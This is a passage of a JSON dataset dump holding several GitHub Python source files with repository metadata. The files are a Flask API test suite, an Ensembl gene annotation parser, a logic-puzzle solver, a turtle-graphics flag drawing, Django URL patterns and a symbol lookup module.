regular person\");\n\t#print manipulate\n\n\t# removes character:\n\t#manipulate.remove_char(\"i\");\n\t#print manipulate;\n\n\t# removes multiple character:\n\t#manipulate.remove_char(\"it\");\n\t#print manipulate;\n\n\t# removes word \n\t#manipulate.remove_words(\"After\");\n\t#print manipulate;\n\n\t# removes multiple word \n\t#manipulate.remove_words(\"After there he\");\n\t#print manipulate;\n\n\t# removes word with specfied character\n\t#manipulate.remove_words_with_char(\"h\");\n\t#print manipulate;\n\n\t# replaces word\n\t#manipulate.replace_word(\"After\", \"abc\");\n\t#print manipulate;\n\n\t# remove repeated words\n\t#manipulate.remove_repeats();\n\t#print manipulate;\n\n\t\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1180,"cells":{"__id__":{"kind":"number","value":2156073599821,"string":"2,156,073,599,821"},"blob_id":{"kind":"string","value":"525af838df69a2a92861bb1faaf2867222a225ec"},"directory_id":{"kind":"string","value":"d88e79d82ef37bc060c915baa29136c3e8acd61f"},"path":{"kind":"string","value":"/test/test_api.py"},"content_id":{"kind":"string","value":"c571b98c1abbf6f7d099a68c13c44f5bdea2981d"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"koolhead17/hypernotes"},"repo_url":{"kind":"string","value":"https://github.com/koolhead17/hypernotes"},"snapshot_id":{"kind":"string","value":"7f6085c8ad6be321cbc3dd1a1f97853b26da4fa8"},"revision_id":{"kind":"string","value":"43073d2cc3503b5f0c6ef50411b66aa362e53459"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-10-12T01:47:11.044708","string":"2016-10-12T01:47:11.044708"},"revision_date":{"kind":"timestamp","value":"2011-08-09T11:48:55","string":"2011-08-09T11:48:55"},"committer_date":{"kind":"timestamp","value":"2011-08-09T11:48:55","string":"2011-08-09T11:48:55"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"import json\nfrom hypernotes import web\nfrom hypernotes import logic\n\nTESTDB = 'hypernotes-test'\n\nclass TestApi(object):\n @classmethod\n def setup_class(cls):\n web.app.config['ELASTIC_SEARCH_HOST'] = '127.0.0.1:9200'\n web.app.config['ELASTIC_DB'] = TESTDB\n logic.init_db()\n cls.app = web.app.test_client()\n cls.make_fixtures()\n\n @classmethod\n def teardown_class(cls):\n conn, db = logic.get_conn()\n conn.delete_index(TESTDB)\n\n @classmethod\n def make_fixtures(self):\n self.username = u'tester'\n inuser = {\n 'id': self.username,\n 'fullname': 'The Tester'\n }\n indata = {\n 'title': 'My New Note',\n 'body': '## Xyz',\n 'tags': ['abc', 'efg'],\n 'owner': self.username\n }\n self.app.post('/api/v1/user', data=json.dumps(inuser))\n out = self.app.post('/api/v1/note', data=json.dumps(indata))\n self.note_id = json.loads(out.data)['id']\n self.thread_name = 'default'\n inthread = {\n 'name': self.thread_name,\n 'title': 'My Test Thread',\n 'description': 'None at the moment',\n 'notes': [ self.note_id ],\n 'owner': self.username\n }\n out = self.app.post('/api/v1/thread', data=json.dumps(inthread))\n self.thread_id = json.loads(out.data)['id']\n\n def test_user(self):\n res = self.app.get('/api/v1/user/%s' % self.username)\n data = json.loads(res.data)\n assert data['fullname'] == 'The Tester', data\n\n def test_note(self):\n res = self.app.get('/api/v1/note/%s' % self.note_id)\n assert res.status_code == 200, res.status\n data = json.loads(res.data)\n assert data['body'] == '## Xyz', data\n\n def test_note_search_no_query(self):\n res = self.app.get('/api/v1/note?q=')\n assert res.status_code == 200, res.status\n data = json.loads(res.data)\n count = data['result']['hits']['total']\n assert count == 1, count\n\n def test_note_search_2_basic_text(self):\n res = self.app.get('/api/v1/note?q=new')\n assert res.status_code == 200, res.status\n data = json.loads(res.data)\n count = data['result']['hits']['total']\n assert count == 1, count\n\n def test_note_search_3_should_not_match(self):\n res = self.app.get('/api/v1/note?q=nothing-that-should-match')\n assert res.status_code == 200, res.status\n data = json.loads(res.data)\n count = data['result']['hits']['total']\n assert count == 0, count\n\n def test_thread(self):\n res = self.app.get('/api/v1/thread/%s' % self.thread_id)\n assert res.status_code == 200, res.status\n data = json.loads(res.data)\n assert data['title'] == 'My Test Thread', data\n\n res = self.app.get('/api/v1/%s/thread/%s' % (self.username,\n self.thread_name), follow_redirects=True)\n assert res.status_code == 200, res.status\n data = json.loads(res.data)\n assert data['title'] == 'My Test Thread', data\n\n def test_thread_update(self):\n id_ = 'testupdate'\n indata = {\n 'id': id_,\n 'title': 'Abc'\n }\n res = self.app.post('/api/v1/thread', data=json.dumps(indata))\n indata2 = {\n 'id': id_,\n 'title': 'Xyz'\n }\n res = self.app.put('/api/v1/thread/%s' % id_, data=json.dumps(indata2))\n out = logic.Thread.get(id_)\n assert out['title'] == 'Xyz', out\n\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2011,"string":"2,011"}}},{"rowIdx":1181,"cells":{"__id__":{"kind":"number","value":10033043627914,"string":"10,033,043,627,914"},"blob_id":{"kind":"string","value":"6fb8583375ab7029d3863fe4757cd2bb0d90ee1f"},"directory_id":{"kind":"string","value":"8ab66dcf8e91734d730f7799839ceddfa289b4cd"},"path":{"kind":"string","value":"/barnacle-1.0.0/src/parsers/genes/ensembl.py"},"content_id":{"kind":"string","value":"619010af380aafc6d9b30e3e22d36a809e4f94b6"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"ptraverse/gsc"},"repo_url":{"kind":"string","value":"https://github.com/ptraverse/gsc"},"snapshot_id":{"kind":"string","value":"7bbbe67652575b5e7d3ca68e85a213fd7536125d"},"revision_id":{"kind":"string","value":"21e6b699f91cf9604f973d51745c3975cbd8e22c"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-23T17:58:50.910026","string":"2021-01-23T17:58:50.910026"},"revision_date":{"kind":"timestamp","value":"2013-01-03T09:06:05","string":"2013-01-03T09:06:05"},"committer_date":{"kind":"timestamp","value":"2013-01-03T09:06:05","string":"2013-01-03T09:06:05"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"\"\"\"\nensembl.py\n\nCreated by Readman Chiu\nEdited by Lucas Swanson\nCopyright (c) 2012 Canada's Michael Smith Genome Sciences Centre. All rights reserved.\n\"\"\"\n\nimport transcript\nfrom optparse import OptionParser\nimport os, re\n\n#for ensGene.txt from UCSC\nfields_a = {1:\"name\", 2:\"chrom\", 3:\"strand\", 4:\"txStart\", 5:\"txEnd\",\n 6:\"cdsStart\", 7:\"cdsEnd\", 8:\"exonCount\", 9:\"exonStarts\", 10:\"exonEnds\",\n 12:\"alias\"}\n\n#for ensGene_ref.txt created in-house\nfields_b = {0:\"name\", 2:\"chrom\", 3:\"strand\", 4:\"txStart\", 5:\"txEnd\",\n 6:\"cdsStart\", 7:\"cdsEnd\", 8:\"exonCount\", 9:\"exonStarts\", 10:\"exonEnds\",\n 16:\"alias\"}\n\ndef set_fields(file=None, line=None):\n sep = name_field = None\n fields = fields_a\n \n #determine which ensGene file it is\n if file:\n for l in open(file, 'r'):\n line = l\n break\n if line:\n if line[:3].lower() != 'ens':\n fields = fields_a\n sep = \"\\t\"\n name_field = 1\n else:\n fields = fields_b\n sep = \" \"\n name_field = 0\n\n return sep, name_field, fields\n\ndef parse(file):\n txts = []\n sep, name_field, fields = set_fields(file=file)\n \n for line in open(file, 'r'):\n cols = line.rstrip(\"\\n\").split(sep)\n\n if cols[0]:\n txt = transcript.Transcript(cols[name_field])\n \n for i in range(len(cols)):\n if i in fields:\n if fields[i] == 'chrom' and cols[i][:3] != 'chr':\n cols[i] = 'chr' + cols[i]\n \n if i <= 10 or i == 16 or i == 12:\n setattr(txt, fields[i], cols[i])\n\n exonStarts = cols[9].rstrip(',').split(',')\n exonEnds = cols[10].rstrip(',').split(',')\n txt.exons = []\n for e in range(len(exonStarts)):\n #start+1: seems necessary at least for mouse ensembl file\n txt.exons.append([int(exonStarts[e])+1, int(exonEnds[e])])\n\n #calculate transcript length for coverage\n for exon in txt.exons:\n txt.length += int(exon[1]) - int(exon[0]) + 1\n #print txt.name, txt.exonCount, txt.length, txt.exons[0]\n txts.append(txt)\n\n return txts\n\ndef parse_line(line):\n sep, name_field, fields = set_fields(line=line)\n\n cols = line.rstrip(\"\\n\").split(sep)\n if sep and len(cols) > 1:\n txt = transcript.Transcript(cols[name_field])\n \n for i in range(len(cols)):\n if i in fields:\n if fields[i] == 'chrom' and cols[i][:3] != 'chr':\n cols[i] = 'chr' + cols[i]\n \n if i <= 10 or i == 16 or i == 12:\n setattr(txt, fields[i], cols[i])\n\n exonStarts = cols[9].rstrip(',').split(',')\n exonEnds = cols[10].rstrip(',').split(',')\n txt.exons = []\n for e in range(len(exonStarts)):\n txt.exons.append([int(exonStarts[e])+1, int(exonEnds[e])])\n\n #calculate transcript length for coverage\n for exon in txt.exons:\n txt.length += int(exon[1]) - int(exon[0]) + 1\n\n return txt\n\n return None\n\ndef index(input, output):\n sep, name_field, fields = set_fields(file=input)\n \n indices = {}\n data_file = os.path.abspath(input)\n line_num = 1\n for line in open(input, 'r'):\n cols = line.rstrip().split(sep)\n\n start = int(int(cols[4])/1000)\n end = int(int(cols[5])/1000)\n target = cols[2]\n \n if not re.match('^(chr|scaffold)', target, re.IGNORECASE):\n target = 'chr' + target\n \n #print cols[0],target,start,end\n for n in range(start,end+1):\n index = ':'.join((target,str(n)))\n value = str(line_num)\n\n if not indices.has_key(index):\n indices[index] = [value]\n else:\n indices[index].append(value)\n\n line_num += 1\n\n index_file = open(output, 'w')\n for index in sorted(indices.keys()):\n index_file.write(' '.join((index, ','.join(indices[index]))) + \"\\n\")\n\ndef output(txts, outfile):\n fields = fields_a\n\n list_size = int(fields.keys()[-1])+1\n\n field_idx = {}\n for idx, field in fields.iteritems():\n if field in ('exonStarts', 'exonEnds', 'exonCount'):\n field_idx[field] = idx\n\n out = open(outfile, 'w')\n for i in range(len(txts)):\n txt = txts[i]\n \n data = []\n for idx in range(list_size):\n data.append('NA')\n \n for idx, field in fields.iteritems():\n try:\n value = getattr(txt, field)\n except AttributeError:\n continue\n else:\n data[idx] = str(value)\n\n data[0] = str(i)\n\n data[field_idx['exonStarts']] = ','.join([str(int(i[0])-1) for i in txt.exons])\n data[field_idx['exonEnds']] = ','.join([str(i[1]) for i in txt.exons])\n data[field_idx['exonCount']] = str(len(txt.exons))\n \n out.write('\\t'.join(data) + '\\n')\n \n out.close()\n \nif __name__ == '__main__':\n usage = \"Usage: %prog annotation-file\"\n parser = OptionParser(usage=usage)\n parser.add_option(\"-i\", \"--index\", dest=\"index\", help=\"index output file\")\n\n (options, args) = parser.parse_args()\n\n if options.index:\n index(args[0], options.index)\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2013,"string":"2,013"}}},{"rowIdx":1182,"cells":{"__id__":{"kind":"number","value":10170482569770,"string":"10,170,482,569,770"},"blob_id":{"kind":"string","value":"9fe0ecc6438502ba1baa363a7adb9dd9e18e3a08"},"directory_id":{"kind":"string","value":"8c8a50c1c3b01ec920184506eee31bee9165b208"},"path":{"kind":"string","value":"/w7/logicpuzzle.py"},"content_id":{"kind":"string","value":"7b3d6f589035a55eb05adf5fca560d04fa9616e0"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"likhtal/CS212"},"repo_url":{"kind":"string","value":"https://github.com/likhtal/CS212"},"snapshot_id":{"kind":"string","value":"b9231337192dc3627c258da83ffe6e6a51ac5dcf"},"revision_id":{"kind":"string","value":"1968afd8a9757de9f19f00b12973fd0e773964af"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-07T20:29:10.800748","string":"2016-09-07T20:29:10.800748"},"revision_date":{"kind":"timestamp","value":"2012-06-22T18:54:06","string":"2012-06-22T18:54:06"},"committer_date":{"kind":"timestamp","value":"2012-06-22T18:54:06","string":"2012-06-22T18:54:06"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"\"\"\"\nUNIT 2: Logic Puzzle\n\nYou will write code to solve the following logic puzzle:\n\n1. The person who arrived on Wednesday bought the laptop.\n2. The programmer is not Wilkes.\n3. Of the programmer and the person who bought the droid,\n one is Wilkes and the other is Hamming.\n4. The writer is not Minsky.\n5. Neither Knuth nor the person who bought the tablet is the manager.\n6. Knuth arrived the day after Simon.\n7. The person who arrived on Thursday is not the designer.\n8. The person who arrived on Friday didn't buy the tablet.\n9. The designer didn't buy the droid.\n10. Knuth arrived the day after the manager.\n11. Of the person who bought the laptop and Wilkes,\n one arrived on Monday and the other is the writer.\n12. Either the person who bought the iphone or the person who bought the tablet\n arrived on Tuesday.\n\nYou will write the function logic_puzzle(), which should return a list of the\nnames of the people in the order in which they arrive. For example, if they\nhappen to arrive in alphabetical order, Hamming on Monday, Knuth on Tuesday, etc.,\nthen you would return:\n\n['Hamming', 'Knuth', 'Minsky', 'Simon', 'Wilkes']\n\n(You can assume that the days mentioned are all in the same week.)\n\"\"\"\n\nimport itertools\n\ndef logic_puzzle():\n \"Return a list of the names of the people, in the order they arrive.\"\n ## your code here; you are free to define additional functions if needed\n # return ['Wilkes', 'Simon', 'Knuth', 'Hamming', 'Minsky']\n\n days = mon, tue, wed, thu, fri = [1, 2, 3, 4, 5]\n orderings = list(itertools.permutations(days))\n gen = (dict([(h, \"Hamming\"), (k,\"Knuth\"), (m,\"Minsky\"), (s,\"Simon\"), (w, \"Wilkes\")])\n for (h, k, m, s, w) in orderings\n if k == s + 1\n for (programmer, writer, manager, designer, _) in orderings\n if (programmer is not w)\n and (writer is not m)\n and (designer is not thu)\n and (k == manager + 1)\n and (writer is not mon)\n for (laptop, droid, tablet, iphone, _) in orderings\n if (laptop is wed)\n and (tablet is not fri)\n and (w is not laptop)\n and (set([programmer, droid]) == set([w, h]))\n and (programmer is not droid)\n and (manager is not k and manager is not tablet)\n and (designer is not droid)\n and (set([w, laptop]) == set([mon, writer]))\n and (iphone is tue or tablet is tue))\n result = next(gen)\n return [result[key] for key in range(1,6)]\n \nprint logic_puzzle()\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2012,"string":"2,012"}}},{"rowIdx":1183,"cells":{"__id__":{"kind":"number","value":14800457340020,"string":"14,800,457,340,020"},"blob_id":{"kind":"string","value":"7bd281ab8753ced41145b2a3e7a8af86e31a70ad"},"directory_id":{"kind":"string","value":"9fffb8d0539a27722695ee1bf77afda2255f4120"},"path":{"kind":"string","value":"/Python Codes/Project 04.py"},"content_id":{"kind":"string","value":"6610fb275549666fc9f87c4eff1d7c1a2e9c9205"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"mukasama/portfolio"},"repo_url":{"kind":"string","value":"https://github.com/mukasama/portfolio"},"snapshot_id":{"kind":"string","value":"fdde5f1b022cc3d7b5abf1c35e170ad9f5d3f401"},"revision_id":{"kind":"string","value":"92e1d231f76ad7473a2318da87e8b3817a9e4e5b"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-07T15:41:07.331327","string":"2016-09-07T15:41:07.331327"},"revision_date":{"kind":"timestamp","value":"2014-10-19T17:53:42","string":"2014-10-19T17:53:42"},"committer_date":{"kind":"timestamp","value":"2014-10-19T17:53:42","string":"2014-10-19T17:53:42"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"# Section 09\r\n# 10/ 08/ 2012\r\n# Project 04\r\n\r\nimport turtle\r\n\r\nturtle.goto(100,0)\r\n\r\n# Function draw_rectangle, draws a rectangle with desginated lenght and height which then fills in the color(s).\r\ndef draw_rectangle(length,height,color):\r\n\r\n turtle.pendown()\r\n turtle.color(get_color(color))\r\n turtle.begin_fill()\r\n turtle.right(90)\r\n turtle.forward(length)\r\n turtle.right(90)\r\n turtle.forward(height)\r\n turtle.right(90)\r\n turtle.forward(length)\r\n turtle.right(90)\r\n turtle.forward(height)\r\n turtle.end_fill()\r\n turtle.penup()\r\n\r\n# Function draw_rectangle2 draws the outline of the rectangle with same lenght along with the desginated lenght, height and color.\r\ndef draw_rectangle2(length,height,color):\r\n\r\n turtle.pendown()\r\n turtle.color(get_color(color))\r\n turtle.right(90)\r\n turtle.forward(length)\r\n turtle.right(90)\r\n turtle.forward(height)\r\n turtle.right(90)\r\n turtle.forward(length)\r\n turtle.right(90)\r\n turtle.forward(height)\r\n turtle.penup()\r\n\r\n# The get_color function is used to determine red, blue and white colors from a parameter color sting.\r\ndef get_color(color):\r\n if color == \"red\":\r\n return 1,0,0\r\n if color == \"blue\":\r\n return 0,0,1\r\n if color == \"white\":\r\n return 1,1,1\r\n if color == \"black\":\r\n return 0,0,0\r\n\r\n# Draw_star function draws a star with desginated angles and lengths which then fills it with the color.\r\ndef draw_star(size, color):\r\n\r\n turtle.pendown()\r\n turtle.begin_fill()\r\n turtle.color(1,1,1)\r\n turtle.forward(2.5) \r\n turtle.left(size)\r\n turtle.forward(2.5)\r\n turtle.right(144)\r\n turtle.forward(2.5)\r\n turtle.left(size)\r\n turtle.forward(2.5)\r\n turtle.right(144)\r\n turtle.forward(2.5)\r\n turtle.left(size)\r\n turtle.forward(2.5)\r\n turtle.right(144)\r\n turtle.forward(2.5)\r\n turtle.left(size)\r\n turtle.forward(2.5)\r\n turtle.right(144)\r\n turtle.forward(2.5)\r\n turtle.left(size)\r\n turtle.forward(2.5)\r\n turtle.right(144)\r\n turtle.end_fill()\r\n turtle.penup()\r\n\r\n# draw_flag is a function that draws a fag of a certain heing. \r\ndef draw_flag(height):\r\n\r\n size = 72\r\n color = \"white\"\r\n\r\n# Letters \"a\" is just a variable I choose to complete my formula to draw the small blue rectangle.\r\n \r\n for a in range(7):\r\n\r\n turtle.speed(100)\r\n turtle.down()\r\n draw_rectangle(height/13,height*1.9,\"red\")\r\n turtle.right(90)\r\n turtle.forward((height/13)*2)\r\n turtle.left(90)\r\n \r\n draw_rectangle(height, height*1.9, \"white\")\r\n\r\n turtle.goto(100,0)\r\n draw_rectangle2(height,324,\"black\")\r\n \r\n turtle.goto(-93.5, 0)\r\n draw_rectangle(height*.5385,height*.76, \"blue\")\r\n\r\n# Letters b, c, d, e, f, g, h, i, j, k are just variables I choose to complete my formula to draw the 50 stars.\r\n \r\n turtle.goto(-218,-6)\r\n for c in range(6):\r\n draw_star(size, 'white')\r\n turtle.forward(22)\r\n\r\n turtle.goto(-209,-16)\r\n for d in range(5):\r\n draw_star(size, 'white')\r\n turtle.forward(23) \r\n\r\n turtle.goto(-218,-26)\r\n for e in range(6):\r\n draw_star(size, 'white')\r\n turtle.forward(22)\r\n\r\n turtle.goto(-209,-36)\r\n for f in range(5):\r\n draw_star(size, 'white')\r\n turtle.forward(23)\r\n \r\n turtle.goto(-218,-46)\r\n for g in range(6):\r\n draw_star(size, 'white')\r\n turtle.forward(22)\r\n \r\n turtle.goto(-209,-56)\r\n for h in range(5):\r\n draw_star(size, 'white')\r\n turtle.forward(23)\r\n\r\n turtle.goto(-218,-66)\r\n for i in range(6):\r\n draw_star(size, 'white')\r\n turtle.forward(22)\r\n\r\n turtle.goto(-209,-76)\r\n for j in range(5):\r\n draw_star(size, 'white')\r\n turtle.forward(23)\r\n\r\n turtle.goto(-218,-86)\r\n for k in range(6):\r\n draw_star(size, 'white')\r\n turtle.forward(22)\r\n \r\ndraw_flag(170) \r\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1184,"cells":{"__id__":{"kind":"number","value":9259949530741,"string":"9,259,949,530,741"},"blob_id":{"kind":"string","value":"037482b2f1a965d3d7f20a037f1fd8166cefd5e6"},"directory_id":{"kind":"string","value":"83aa3050fe8c3467a9eb6005c5804fbab9497379"},"path":{"kind":"string","value":"/merchant/urls.py"},"content_id":{"kind":"string","value":"f676e5690fc11058167dcca5e8b9a30453d7657f"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"igorlebovic/Mobile-Order-Placement"},"repo_url":{"kind":"string","value":"https://github.com/igorlebovic/Mobile-Order-Placement"},"snapshot_id":{"kind":"string","value":"28e6ab94e5d6359c69997468e290196716addd5a"},"revision_id":{"kind":"string","value":"0064c4c96faf9d5a53769d4ec179f9c96bbf1070"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-08-03T09:35:04.184759","string":"2016-08-03T09:35:04.184759"},"revision_date":{"kind":"timestamp","value":"2011-03-05T07:22:59","string":"2011-03-05T07:22:59"},"committer_date":{"kind":"timestamp","value":"2011-03-05T07:22:59","string":"2011-03-05T07:22:59"},"github_id":{"kind":"number","value":1429277,"string":"1,429,277"},"star_events_count":{"kind":"number","value":1,"string":"1"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"from django.conf.urls.defaults import *\n\nurlpatterns = patterns('speeqeweb.merchant.views',\n (r'^(?P[\\d]+)-(?P[-\\w]+)/$', 'merchant_home'),\n (r'^menu/(?P[\\d]+)/$', 'merchant_menu'),\n (r'^pos/(?P[\\d]+)/$', 'pos'),\n (r'^pos2/(?P[\\d]+)/$', 'pos2'),\n (r'^login/(?P[\\d]+)/$', 'login'),\n (r'^manageorder/(?P[-\\w]+)/$', 'manageorder'),\n (r'^manageorder2/(?P[-\\w]+)/$', 'manageorder2'),\n (r'^manageorder3/(?P[-\\w]+)/$', 'manageorder3'),\n)\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2011,"string":"2,011"}}},{"rowIdx":1185,"cells":{"__id__":{"kind":"number","value":13159779829639,"string":"13,159,779,829,639"},"blob_id":{"kind":"string","value":"cec712bbde54b52b0a0b67e1a9af60c8bc902fa3"},"directory_id":{"kind":"string","value":"4d31c9548777356e4fca0303f09df311d6df352e"},"path":{"kind":"string","value":"/lib/data/symbol.py"},"content_id":{"kind":"string","value":"72b35d4f01111c3ef02cd28474b29de6a89903bc"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"enki-labs/heck"},"repo_url":{"kind":"string","value":"https://github.com/enki-labs/heck"},"snapshot_id":{"kind":"string","value":"021421ec3df60b952ae472b838e10d8c8cb63e33"},"revision_id":{"kind":"string","value":"5e9d3c1559e54087d1f83507e25ed891e4649695"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-10T19:31:06.706602","string":"2021-01-10T19:31:06.706602"},"revision_date":{"kind":"timestamp","value":"2014-04-26T14:22:17","string":"2014-04-26T14:22:17"},"committer_date":{"kind":"timestamp","value":"2014-04-26T14:22:17","string":"2014-04-26T14:22:17"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"\"\"\"\nInstrument class accessing metadata, mappings etc.\n\n\"\"\"\n\nfrom lib import common\nfrom lib import schema\n\ndef get_reuters (symbol):\n \"\"\" Get an instrument using a Reuters symbol \"\"\"\n symbol_resolve = schema.table.symbol_resolve\n args = and_(symbol_resolve.columns.symbol==symbol, symbol_resolve.columns.source==\"reuters\")\n matches = schema.select(symbol_resolve, args)\n if matches.rowcount == 0:\n raise Exception(\"Cannot map Reuters instrument %s\" % symbol)\n return Series(matches.fetchone()[2])\n\ndef get (symbol, create):\n \"\"\" Get symbol definition \"\"\"\n symbol_instance = schema.select_one(\"symbol\", schema.table.symbol.symbol==symbol)\n if symbol_instance:\n return symbol_instance\n elif create:\n symbol_instance = schema.table.symbol()\n symbol_instance.symbol = symbol\n return symbol_instance\n else:\n raise Exception(\"Unknown symbol (%s)\", symbol)\n\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1186,"cells":{"__id__":{"kind":"number","value":14139032373315,"string":"14,139,032,373,315"},"blob_id":{"kind":"string","value":"975a62f63da8ece923d0d3770343280bdbecf874"},"directory_id":{"kind":"string","value":"6be742824b1f4dd5f87b6afc63d823ad984c22e3"},"path":{"kind":"string","value":"/tests/__init__.py"},"content_id":{"kind":"string","value":"fec3b79eb679e0547d5d34218b0aea99ef724534"},"detected_licenses":{"kind":"list like","value":["AGPL-3.0-only"],"string":"[\n \"AGPL-3.0-only\"\n]"},"license_type":{"kind":"string","value":"non_permissive"},"repo_name":{"kind":"string","value":"BlackFlagConsortium/makershop"},"repo_url":{"kind":"string","value":"https://github.com/BlackFlagConsortium/makershop"},"snapshot_id":{"kind":"string","value":"d584c423aa9ad06c51ff772d5e25dbbaa21bf555"},"revision_id":{"kind":"string","value":"01bfb465538f28bbe20489887355af6c0bb4a5c1"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-10T21:18:44.391962","string":"2021-01-10T21:18:44.391962"},"revision_date":{"kind":"timestamp","value":"2013-11-06T19:47:34","string":"2013-11-06T19:47:34"},"committer_date":{"kind":"timestamp","value":"2013-11-06T19:47:34","string":"2013-11-06T19:47:34"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind"